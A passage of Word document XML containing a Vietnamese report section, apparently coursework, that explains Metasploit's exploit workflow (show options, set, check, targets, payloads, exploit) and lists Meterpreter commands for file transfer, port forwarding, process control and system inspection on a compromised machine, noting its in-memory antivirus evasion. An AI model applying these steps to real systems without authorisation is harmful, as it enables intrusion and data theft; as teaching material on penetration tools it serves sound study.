        </w:rPr>
        <w:t>Ta</w:t>
      </w:r>
      <w:r w:rsidR="001F7EFA" w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> nên cập nhật thường xuyên các lỗi dịch vụ trên metasploit.com hoặc qua script msfupdate.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5A8928"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2.5.2.3.2. Cấu hình module exploit đã chọn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4CAE60" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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how options:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Xác định những options nào cần cấu hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECA99FA" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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et</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Cấu hình cho những option của module đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D81E477" w14:textId="5B415BC8"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Một vài module còn có những advanced options,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ó thể xem bằng cách gõ dòng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>show advanceds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B265823"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2.5.2.3.3. Xác nhận những option vừa cấu hình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29100551" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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check:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Kiểm tra xem những option đã được set chính xác chưa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A8BCA8"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2.5.2.3.4. Lựa chọn mục tiêu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725A56C4"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Lựa chọn hệ diều hành muốn thực hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBF7FF6" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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how targets:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> những target được cung cấp bởi module đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639CC36D" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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et</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: xác định target nào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10021C3E"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2.5.2.3.5. Lựa chọn payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0242BA"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Payload là đoạn code mà sẽ chạy trên hệ thống máy tính được điều khiển từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC6A8FF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>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how payloads:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Liệt kê ra những payload của module exploit hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094E06CC" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>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info payload_name:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Xem thông tin chi tiết về payload đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11677084" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>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et PAYLOAD payload_name:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Xác định payload module name.Sau khi lựa chọn payload nào, dùng lệnh show option để xem những option của payload đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48543877" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>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how advanced:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Xem những advanced option của payload đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62071621"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lastRenderedPageBreak/>
        <w:t>2.5.2.3.6. Thực thi exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E8D537" w14:textId="23A3D0EB" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>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exploit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho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những thông tin về hệ thống được khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33488808" w14:textId="7777777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74" w:name="_Toc90050770"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.2.4. Giới thiệu payload meterpreter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="009767B6"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eterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong Metasploit framework. Muc đích của nó là để cung cấp những tập lệnh để khai thác, tấn câng các máy remote computers. Nó được viết từ các developers dưới dạng shared object (DLL) files. Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B726B90"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eterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên các remote computer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9540DC" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Fs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Cho phép upload và download files từ các remote machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE64384" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Net:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Cho phép xem thông tin mạng của remote machine như IP, route table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB8E1B6" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Process:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Cho phép tạo các processes mới trên remote machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB7FD40" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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ys:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Cho phép xem thông tin hệ thống của remote machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B5D16"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ử dụng câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAEF0DC" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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use -m module1,module2,module3 [ -p path ] [ -d ]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Câu lệnh use dùng để load những module mở rộng của meterpreter như: Fs, Net, Process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685ACF8F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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loadlib -f library [ -t target ] [ -lde ]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Câu lệnh cho phép load các thư viện của remote machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED97E28" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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read channel_id [length]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Lệnh read cho phép xem dữ liêu của remote machine trên channel đang kết nối.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C9C33B" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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write channel_id</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Lệnh write cho phép ghi dữ liệu lên remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F53B4A1" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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close channel_id</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Đóng channel mà đã kết nối với remote computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79456A9D" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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interact channel_id</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Bắt đầu một phiên làm việc với channel vừa thiết lập với remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7717F90D" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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initcrypt cipher [parameters]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Mã hoá dữ liệu được gửi giữa host và remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBA56D7"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ử dụng module Fs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Cho phép upload và download files từ các remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A25E55" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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lastRenderedPageBreak/>
        <w:t>cd directory:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Giống lệnh cd của command line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1009AFD5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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getcwd: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Cho biết thư mục đang làm việc hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAB46C2" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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ls [filter_string]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: liệt kê các thư mục và tập tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC66C25" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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upload src1 [src2 ...] dst</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Upload file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362FC852" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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download src1 [src2 ...] dst</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Download file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6224B573"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ử dụng module Net:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3551D771" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC2DBA6" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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route:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Xem bảng định tuyến của remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117141BB" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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portfwd [ -arv ] [ -L laddr ] [ -l lport ] [ -h rhost ] [ -p rport ] [ -P ]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Cho phép tạo port forward giữa host và remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F34EEB"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ử dụng module Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512758C0" w14:textId="3776865D" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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execute -f file [ -a args ] [ -Hc ]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: Câu lệnh execute cho phép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tạo ra một process mới trên remote machine và sử dụng process đó để khai thác dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D848D3F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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kill pid1 pid2 pid3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Huỷ những process đang chạy trên máy remote machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112B9F61" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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ps</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Liệt kê những process của remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518DF885" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sử dụng module Sys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E83ED91" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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getuid</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Cho biết username hiện tại của remote machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363DB90E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Cho biết thông tin về tên máy tính, hệ điều hành.</w:t>
      </w:r>
    </w:p>
